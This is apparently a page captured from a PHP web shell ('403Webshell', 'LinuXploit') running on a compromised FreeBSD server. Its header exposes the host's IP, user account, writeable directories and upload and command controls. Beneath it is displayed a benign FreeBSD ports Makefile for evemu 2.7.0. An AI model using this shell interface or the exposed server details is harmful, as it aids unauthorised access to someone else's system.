403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/devel/evemu/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/devel/evemu/Makefile
PORTNAME=	evemu
PORTVERSION=	2.7.0
CATEGORIES=	devel
MASTER_SITES=	http://www.freedesktop.org/software/${PORTNAME}/

MAINTAINER=	wulf@FreeBSD.org
COMMENT=	Records and replays EVDEV descriptions and events
WWW=		https://www.freedesktop.org/wiki/Evemu/

LICENSE=	GPLv3

BUILD_DEPENDS=	${LOCALBASE}/include/linux/input.h:devel/evdev-proto
LIB_DEPENDS=	libevdev.so:devel/libevdev

USES=		tar:xz pathfix libtool pkgconfig localbase

OPTIONS_DEFINE=	MANPAGES PYTHON
OPTIONS_DEFAULT=MANPAGES
OPTIONS_SUB=	yes

MANPAGES_BUILD_DEPENDS=		minixmlto:textproc/minixmlto \
				asciidoc:textproc/asciidoc
MANPAGES_CONFIGURE_ENV=		XMLTO=${LOCALBASE}/bin/minixmlto
MANPAGES_CONFIGURE_ENV_OFF=	ac_cv_path_XMLTO="" \
				ac_cv_path_ASCIIDOC=""
PYTHON_USES=			python
PYTHON_USES_OFF=		python:build
PYTHON_CONFIGURE_ENABLE=	python-bindings
PYTHON_USE=			PYTHON=py3kplist

GNU_CONFIGURE=	yes
CFLAGS+=	-include stdlib.h -include limits.h
USE_LDCONFIG=	yes
INSTALL_TARGET=	install-strip
REINPLACE_ARGS=	-i ''

TEST_TARGET=	check
TEST_WRKSRC=	${WRKSRC}/test

post-patch:
	${REINPLACE_CMD} -e 's|program_invocation_short_name|getprogname()|' \
		${WRKSRC}/tools/evemu-event.c ${WRKSRC}/tools/evemu-play.c \
		${WRKSRC}/tools/evemu-record.c
	${REINPLACE_CMD} -e 's|versionsort|alphasort|' \
		${WRKSRC}/tools/find_event_devices.c

# Fix evemu-event.1, evemu-play.1 and evemu-record.1 manpages which are broken
# due to docbook-xsl bug: https://sourceforge.net/p/docbook/bugs/1058/
post-install-MANPAGES-on:
.for manpage in evemu-event.1 evemu-play.1 evemu-record.1
	@${REINPLACE_CMD} -e 's|^\.so evemu|.so man1/evemu|' \
		${STAGEDIR}${MANPREFIX}/man/man1/${manpage}
.endfor

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit